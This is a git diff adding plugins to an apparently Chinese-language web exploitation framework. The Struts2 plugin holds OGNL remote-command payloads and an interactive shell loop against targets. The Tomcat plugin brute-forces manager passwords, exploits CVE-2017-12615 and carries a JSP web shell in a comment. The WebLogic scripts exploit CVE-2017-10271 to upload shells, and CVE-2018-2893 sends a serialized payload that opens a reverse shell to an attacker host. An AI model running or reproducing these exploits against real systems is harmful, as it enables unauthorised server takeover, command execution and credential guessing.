req.text) + except Exception as e: + cprint("检测struts2-devmode超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-032'], headers=headers, timeout=6, verify=False) + self.check("struts2-032", req.text) + except Exception as e: + cprint("检测struts2-032超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-033'], headers=headers, timeout=6, verify=False) + self.check("struts2-033", req.text) + except Exception as e: + cprint("检测struts2-033超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-037'], headers=headers, timeout=6, verify=False) + self.check("struts2-037", req.text) + except Exception as e: + cprint("检测struts2-037超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url, headers=headers2, timeout=6, verify=False) + self.check("struts2-045", req.text) + except Exception as e: + cprint("检测struts2-045超时..", "cyan") + print("超时原因: ", e) + + try: + uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + self.check("struts2-046", req.text) + except Exception as e: + cprint("检测struts2-046超时..", "cyan") + print("超时原因: ", e) + + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.poc['ST2-048'], + "age":"1", + "__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + self.check("struts2-048", req.text) + except Exception as e: + cprint("检测struts2-048超时..", "cyan") + print("超时原因: ", e) + + try: + req1 = requests.get(self.url+"?class[%27classLoader%27][%27jarPath%27]=1", headers=headers, timeout=6, verify=False) + req2 = requests.get(self.url+"?class[%27classLoader%27][%27resources%27]=1", headers=headers, timeout=6, verify=False) + if req1.status_code == 200 and req2.status_code == 404: + cprint("目标存在struts2-020漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-020漏洞..", "green") + except Exception as e: + cprint("检测struts2-020超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, data=self.poc['ST2-052'], headers=headers_052, timeout=6, verify=False) + if req.status_code == 500 and r"java.security.Provider$Service" in req.text: + cprint("目标存在struts2-052漏洞..(参考metasploit中的struts2_rest_xstream模块)", "red") + else: + cprint("目标不存在struts2-052漏洞..", "green") + except Exception as e: + cprint("检测struts2-052超时..", "cyan") + print("超时原因: ", e) + + try: + param="" + vulnurl = self.url + "?" + param + "=" + self.poc['ST2-053'] + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + self.check("struts2-053", req.text) + except Exception as e: + cprint("检测struts2-053超时..", "cyan") + print("超时原因: ", e) + + try: + self.url = self.url.replace("/actionChain1.action", "/${12345%2a54321}/actionChain1.action") + req = requests.get(self.url, timeout=6, verify=False, allow_redirects=True) + if r"670592745" in req.url: + cprint("目标存在struts2-057漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-057漏洞..(只提供检测)", "green") + except Exception as e: + cprint("检测struts2-057超时..", "cyan") + print("超时原因: ", e) + + + def inShell(self, pocname): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------struts2 交互式shell--------\n目标url:"+self.url, "cyan") + prompt = "shell >>" + + if pocname == "struts2-005": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-005'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-009": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-009'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-013": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-013'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-016": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-016'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-019": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + command = re.sub(r"\s{2,}", " ", command).replace(" ", "','") + req = requests.post(self.url, data=self.shell['struts2-019'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-devmode": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-devmode'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-032": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-032'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-033": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-033'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-037": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-037'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-045": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + headers_exp = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", + } + try: + req = requests.get(self.url, headers=headers_exp, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-046": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-048": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.shell['struts2-048'].replace("FUZZINGCOMMAND", command), + "age":"1", + "__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-053": + param = input("请指定struts2-053参数: ") + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = self.url + "?" + param + "=" + self.shell['struts2-053'].replace("FUZZINGCOMMAND", command) + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + pattern = r'81dc9bdb52d04dc2([\s\S]*)0036dbd8313ed055' + m = re.search(pattern,req.text) + if m: + print(m.group(1).strip()) + print("\n") + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + +if __name__ == "__main__": + filecontent = open("success.txt", "a+") + try: + if sys.argv[1] == "-f": + with open(sys.argv[2]) as f: + for line in f.readlines(): + line = line.strip() + strutsVuln = struts_baseverify(line) + strutsVuln.scan() + elif sys.argv[1] == "-u" and sys.argv[3] == "-i": + strutsVuln = struts_baseverify(sys.argv[2].strip()) + strutsVuln.inShell(sys.argv[4].strip()) + else: + strutsVuln = struts_baseverify(sys.argv[1].strip()) + strutsVuln.scan() + except Exception as e: + figlet = '''Code by Lucifer.''' + cprint(figlet,'cyan') + print("Usage: python struts-scan.py http://example.com/index.action 检测") + print(" python struts-scan.py -u http://example.com/index.action -i struts2-045 进入指定漏洞交互式shell") + print(" python struts-scan.py -f url.txt 批量检测") + +def struts2_special_plugin_(arg,config): + print(arg.url) + struts_baseverify(arg.url).scan() diff --git a/plugins/test.py b/plugins/test.py deleted file mode 100644 index 9e5f5f8..0000000 --- a/plugins/test.py +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/plugins/tomcat_plugin.py b/plugins/tomcat_plugin.py new file mode 100644 index 0000000..8c170ee --- /dev/null +++ b/plugins/tomcat_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":["/manager/html/upload"], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/tomcat_special_plugin_.py b/plugins/tomcat_special_plugin_.py new file mode 100644 index 0000000..3b79907 --- /dev/null +++ b/plugins/tomcat_special_plugin_.py @@ -0,0 +1,84 @@ +#coding=utf-8 +import urllib.request, urllib.error, urllib.parse +import base64 +import requests +import uuid +from termcolor import cprint +from urllib.parse import urlparse +from concurrent.futures import ThreadPoolExecutor +def requests_post(url,username,password,flag_list): + try: + login_url = url + '/manager/html' + auth_str_temp = user + ':' + password + auth_str_temp = bytes(auth_str_temp, encoding="utf8") + auth_str = base64.b64encode(auth_str_temp) + auth_str = str(auth_str, encoding="utf8") + headers = {'Authorization': 'Basic ' + auth_str} + res = requests.post(url=login_url, headers=headers, timeout=config.Timeout) + success_num=0 + for flag in flag_list: + if flag in res_html: + success_num=success_num+1 + info = '%s Tomcat Weak password %s:%s' % (login_url, user, password) + if success_num>0: + print(info) + except Exception: + pass +def crack_password(arg,config): + url = "http://%s"%(arg.url) + print("对tomcat weak password 进行检测") + flag_list=['Application Manager','Welcome'] + user_list=['admin','manager','tomcat','apache','root'] + pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root'] + with ThreadPoolExecutor(config.ThreadNum) as excetor: + for user in user_list: + for password in pass_list: + try: + excetor.submit(requests_post(arg.url, user, password, flag_list)) + except Exception: + pass + + +''' +http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html +https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 +https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e +''' +#脚本来自:https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py +class Exploit: + def attack(self, url): + uu = uuid.uuid4() + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp + # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' + body = '''<%out.print("test");%>''' + url_parse = urlparse(url) + url = r'http://' + url if url_parse.scheme == '' else url + put_url = r'{}/{}.jsp/'.format(url,uu) + try: + res = requests.put(put_url,data=body,headers=headers) + code = res.status_code + if code == 201: + print('[+]access : {}'.format(put_url[:-1])) + access_url = put_url[:-1] + whoami = requests.get(access_url).text + if r"test" in whoami: + print("[+]存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)\tpayload: " + access_url) + else: + print("[+]不存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)") + else: + return None + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def tomcat_special_plugin_(arg,config): + Exploit().attack(arg.url) + crack_password(arg,config) + diff --git a/plugins/user_agent.py b/plugins/user_agent.py index bfb87b9..3888e2c 100644 --- a/plugins/user_agent.py +++ b/plugins/user_agent.py @@ -232,6 +232,6 @@ def get_user_agent(): 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/11.10 Chromium/18.0.1025.142 Chrome/18.0.1025.142 Safari/535.19', 'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00' ] - return random.choice(user_agents) + return {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Connection": "keep-alive","User-Agent":random.choice(user_agents)} diff --git a/plugins/weblogic_exp/CVE_2017_10271_linux.py b/plugins/weblogic_exp/CVE_2017_10271_linux.py new file mode 100644 index 0000000..65d37dc --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_linux.py @@ -0,0 +1,150 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(command_in,output_file,os): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + #命令执行回显:将命令执行的结果输出到文件中 + #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file) + command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file) + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in_payload)+"" + #XMLDecoder反序列化payload: + cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe' + cmd_param = '-c' if os == 'linux' else '/c' + + payload_1 = " \n" \ + " " \ + " \n" \ + " \n" \ + " \n" \ + " " \ + " " \ + " {} " \ + " " \ + " " \ + " {} " \ + " " \ + " ".format(cmd_app,cmd_param) \ + + command_filtered + \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + "" + return payload_1 + +''' +得到命令执行的回显结果 +''' +def get_output(target,output_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + try: + r = requests.get(output_url,headers = headers,proxies=proxies,timeout=timeout,verify=False) + if r.status_code == requests.codes.ok: + return (True,(r.text.strip())) + elif r.status_code == 404: + return (False,'404 no output') + else: + return (False,r.status_code) + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE +''' +def weblogic_rce(target,cmd,output_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(cmd,output_file,os),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + #delay一下,保证命令执行完整性: + time.sleep(1) + return get_output(target,output_file) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +getshell +''' +def weblogic_getshell(target,output_file,shell_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + with open(shell_file) as f: + cmd = 'echo {}|base64 -d'.format(base64.b64encode(f.read())) + status,result = weblogic_rce(target,cmd,output_file,os) + if status: + print '[+]shell-> {}/bea_wls_internal/{}'.format(target,output_file) + return (status,result) +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='id', help='command to execute,default is "id"') + parse.add_argument('-o', '--output', required=False,default='output.txt', help='output file name,default is output.txt') + parse.add_argument('-s', '--shell', required = False,default='',help='local jsp file name to upload,and set -o xxx.jsp') + parse.add_argument('--os',choices=['linux','win'],default='linux',help='host os:linux or win,default is linux') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + if args.shell!='': + status,result = weblogic_getshell(args.target,args.output,args.shell,args.os) + else: + status,result = weblogic_rce(args.target,args.cmd,args.output,args.os) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2017_10271_win.py b/plugins/weblogic_exp/CVE_2017_10271_win.py new file mode 100644 index 0000000..6c3b6b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_win.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 + +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(shell_file,output_file): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + with open(shell_file) as f: + shell_context = f.read() + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in shell_context)+"" + payload_1 = ''' + + + + + + servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} + {} + + + + + '''.format(output_file,command_filtered) + return payload_1 + +''' +命令执行 +''' +def execute_cmd(target,output_file,command): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + data = {'c':command} + try: + r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout) + if r.status_code == requests.codes.ok: + return (True,r.text.strip()) + elif r.status_code == 404: + return (False,'404 no output') + else: + return (False,r.status_code) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE:上传命令执行的shell文件 +''' +def weblogic_rce(target,cmd,output_file,shell_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + return execute_cmd(target,output_file,cmd) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"') + parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp') + parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2018_2893.py b/plugins/weblogic_exp/CVE_2018_2893.py new file mode 100644 index 0000000..cb5ea42 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2893.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import os +import sys +import struct +''' +可以直接反弹shell +监听 + nc -lvvp reverse_port +发送payload + python weblogic.py target_host target_port reverse_host reverse_port +''' + +if len(sys.argv) < 4: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +host = sys.argv[1] +port = int(sys.argv[2]) + +server_address = (host, port) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + + +reverse_host = sys.argv[3] +reverse_port = int(sys.argv[4]) +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + + +def padhex(s): + s = s.strip('0x') + if len(s) %2 !=0: + return '0'+s + else: + return s + +host_hex = padhex(hex(len(reverse_host))+reverse_host.encode('hex')) +port_hex = padhex(hex(reverse_port)) + + +payloadObj = """aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000078707372003e6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017572000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd0200007870000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e001c4c0004686f737471007e001c4c000870726f746f636f6c71007e001c4c000372656671007e001c7870ffffffffffffffff74000f3137362e3132322e3135372e3131307400132f4a657852656d6f7465546f6f6c732e6a617271007e001e740004687474707078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000017671007e00197372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677371007e00144c000b694d6574686f644e616d6571007e001c5b000b69506172616d547970657371007e001578707571007e00170000000174000a4a6578526576657273657400096c6f6164436c6173737571007e002100000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e0017000000027400%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex) + + 